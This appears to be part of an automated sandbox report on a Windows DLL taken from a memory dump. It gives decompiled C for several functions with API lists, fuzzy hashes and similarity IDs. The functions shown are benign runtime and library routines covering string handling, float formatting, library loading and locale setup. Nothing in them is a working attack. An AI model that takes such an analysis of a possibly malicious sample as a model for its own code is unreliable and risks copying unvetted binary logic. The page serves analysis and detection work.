API String ID: 2005118841-1866435925
Opcode ID: 28be81a5fbc4420a2a737ad1c5f20c5d0ae2655bacb914dc591b811f8ad807bd
Instruction ID: f47176a715c18097dab74ff1d28cf661148141fc4ab29d83113596346a1ba24b
Opcode Fuzzy Hash: 28be81a5fbc4420a2a737ad1c5f20c5d0ae2655bacb914dc591b811f8ad807bd
Instruction Fuzzy Hash: 8EF0CDF3D042157ADB00EB58DD42FE977A85B0831CF34C459FA52AB182EB75E905C761

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6DDD407D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				void* _t33;

				E6DDF00AC(0x6de3808e, __ebx, __edi, __esi, 8);
				_t30 = __ecx;
				 *((intOrPtr*)(_t33 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				 *((intOrPtr*)(_t33 - 4)) = 0;
				 *((intOrPtr*)(_t33 - 0x10)) = 1;
				E6DDD5192(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + 0x10)) + E6DE11D60("[json.exception."));
				E6DDD2D14(_t30, "[json.exception.", E6DE11D60("[json.exception."));
				E6DDD1F57( *((intOrPtr*)(_t33 + 8)));
				return E6DDF0075(_t30);
			}

0x6ddd4084
0x6ddd4089
0x6ddd408b
0x6ddd4090
0x6ddd4093
0x6ddd4096
0x6ddd409d
0x6ddd40a4
0x6ddd40a8
0x6ddd40c0
0x6ddd40d0
0x6ddd40d8
0x6ddd40e4

APIs

__EH_prolog3.LIBCMT ref: 6DDD4084
_strlen.LIBCMT ref: 6DDD40AF
_strlen.LIBCMT ref: 6DDD40C6

Strings

[json.exception., xrefs: 6DDD409F, 6DDD40A7, 6DDD40C5, 6DDD40CD

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _strlen$H_prolog3
String ID: [json.exception.
API String ID: 2883720156-791563284
Opcode ID: 811154aa190d6de0da167e3f7c72dcbb42ff5c8b974c85a49ebb13a1aed2c688
Instruction ID: 76bcc342f288f5b8216a3a33b462f39746761a4f17685ecad2a563f658d71656
Opcode Fuzzy Hash: 811154aa190d6de0da167e3f7c72dcbb42ff5c8b974c85a49ebb13a1aed2c688
Instruction Fuzzy Hash: 37F01DB0608205AFDB44AF78D84067EB6A9FF84248F66051DA519DB241DFB4594187A2

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1F345, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6DE1F345(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6DE01F60(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E6DE375C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E6DE375C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E6DDF39C0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E6DE375C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E6DE37640();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E6DE37640();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E6DE37640();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E6DE1F648(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E6DE378B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E6DE12281();
					_t183 = 0x22;
					 *_t129 = _t183;
					E6DE1215B();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

APIs

_strrchr.LIBCMT ref: 6DE1F3D0
__alldvrm.LIBCMT ref: 6DE1F5D1
__alldvrm.LIBCMT ref: 6DE1F5F3

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction ID: a3b19fe513b9acc275f01d85060012581a435661a780a4f37598abc0634a770d
Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction Fuzzy Hash: D8A13473B0C6969FE7028E58CC907AABBE5EF45314F3541ADD594AB381DB388942C790

Uniqueness

Uniqueness Score: -1.00%

Function 6DE26102, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6DE26102(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t65 = __edx;
				_t34 =  *0x6de9506c; // 0x657f4f7b
				_v8 = _t34 ^ _t69;
				E6DE01F60(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xc0b0a09
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6DDEF8A5(_v8 ^ _t69, _t65, _t68);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E6DDF39C0(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E6DDDDEE1(_t68);
					goto L15;
				}
				_t20 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0xc
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E6DE1F26D(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6DDF01B0();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6DE40EA8,00000000,00000000,008B018B,6DE1DA1E,?,00000004,00000001,6DE40EA8,0000007F,?,008B018B,00000001), ref: 6DE2614F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6DE261D8
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6DE261EA
__freea.LIBCMT ref: 6DE261F3

Part of subcall function 6DE1F26D: HeapAlloc.KERNEL32(00000000,6DDD75D9,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004,00000000,00000000,00000000), ref: 6DE1F29F

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__freea
String ID:
API String ID: 573072132-0
Opcode ID: 328f2415191f57f7c700603c8744ca9087851b31f5109f6c24dc8bd0ba2d2027
Instruction ID: bc889ae5b061b3cec9eb5cc740b88735bbe4a279e48eea8534357c2d218feb90
Opcode Fuzzy Hash: 328f2415191f57f7c700603c8744ca9087851b31f5109f6c24dc8bd0ba2d2027
Instruction Fuzzy Hash: 8231B272A0021A9BDF158FA4CC81EBE3BA5EB40714F21426DFC18E7251EB35D951CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE23E7F, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6DE23E7F(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6de97908 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6de41690 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x657f4f7c
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6DE23E26,?,00000000,00000000,00000000,?,6DE241BD,00000006,FlsSetValue), ref: 6DE23EB1
GetLastError.KERNEL32(?,6DE23E26,?,00000000,00000000,00000000,?,6DE241BD,00000006,FlsSetValue,6DE41C58,FlsSetValue,00000000,00000364,?,6DE1D6D1), ref: 6DE23EBD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6DE23E26,?,00000000,00000000,00000000,?,6DE241BD,00000006,FlsSetValue,6DE41C58,FlsSetValue,00000000), ref: 6DE23ECB

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 4b1b3d891d4def1192ff3fc3c92346858ed77147735ea6208d52c5f325531f0e
Instruction ID: 1e572a207d9454022c087245def828fd3b322e011d6f3c7f5d01e2d9a190230e
Opcode Fuzzy Hash: 4b1b3d891d4def1192ff3fc3c92346858ed77147735ea6208d52c5f325531f0e
Instruction Fuzzy Hash: 6801F73676532B9BCF328A698C45E6B77ECAF067B57210128F909E7240DF21D845CEE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE1558, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6DDE1558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6DDF00AC(0x6de38a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6DDEF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6DDB1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6DDB1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6DDE0143( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6DDB14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6DDF0075(_t15);
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDE155F
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDE1594

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

numpunct.LIBCPMT ref: 6DDE15A5

Part of subcall function 6DDE0143: __EH_prolog3.LIBCMT ref: 6DDE014A

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDE15B6

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: cdb356462dba994da4d6723d7e0cf5d4fd8263fdb3a0d0437969daea3b685594
Instruction ID: 8dbf1575f39f9a1ba529aaa11965bfb2d55b1d26fa2371917e62e11543cc127a
Opcode Fuzzy Hash: cdb356462dba994da4d6723d7e0cf5d4fd8263fdb3a0d0437969daea3b685594
Instruction Fuzzy Hash: 400181B1A44216DADB00EBA4C850BAE7B74AF447C8F520119F65AAB285CBB04A01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE14EC, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6DDE14EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6DDF00AC(0x6de38a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6DDEF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6DDB1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6DDB1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6DDE0110( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6DDB14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6DDF0075(_t15);
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDE14F3
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDE1528

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

numpunct.LIBCPMT ref: 6DDE1539

Part of subcall function 6DDE0110: __EH_prolog3.LIBCMT ref: 6DDE0117

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDE154A

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 03a75a3097b7201ffa471bd982fddf92aaf6f148380c99fd252fad2b64f8c9be
Instruction ID: 6101de75cbd1e4fbecb04ea3cb25b8c15983ac3c3ec19f1310d45bcbca4d8902
Opcode Fuzzy Hash: 03a75a3097b7201ffa471bd982fddf92aaf6f148380c99fd252fad2b64f8c9be
Instruction Fuzzy Hash: B0018671A44226DBDB01EBA8C940BFE7B75AF047C4F12001AF61AAB245CF704A01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEC229, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6DDEC229(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6DDF00AC(0x6de38a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6DDEF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6DDB1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6DDB1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6DDEBD9F( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6DDB14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6DDF0075(_t15);
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEC230
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDEC265

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

numpunct.LIBCPMT ref: 6DDEC276

Part of subcall function 6DDEBD9F: __EH_prolog3.LIBCMT ref: 6DDEBDA6

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDEC287

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 85c5ca77b72c5ea6285c2ed3f800bf4955be5a3fd090710cff156de99538cda5
Instruction ID: 1c88ec565e87d71766ee54ac0dd10678b60a1499e817ec9009b384377bf10ec5
Opcode Fuzzy Hash: 85c5ca77b72c5ea6285c2ed3f800bf4955be5a3fd090710cff156de99538cda5
Instruction Fuzzy Hash: 2D018171944216DBDB10EFA8C880BAE7B74AF047C4F160119F655AB281CBB04A01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB18A0, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

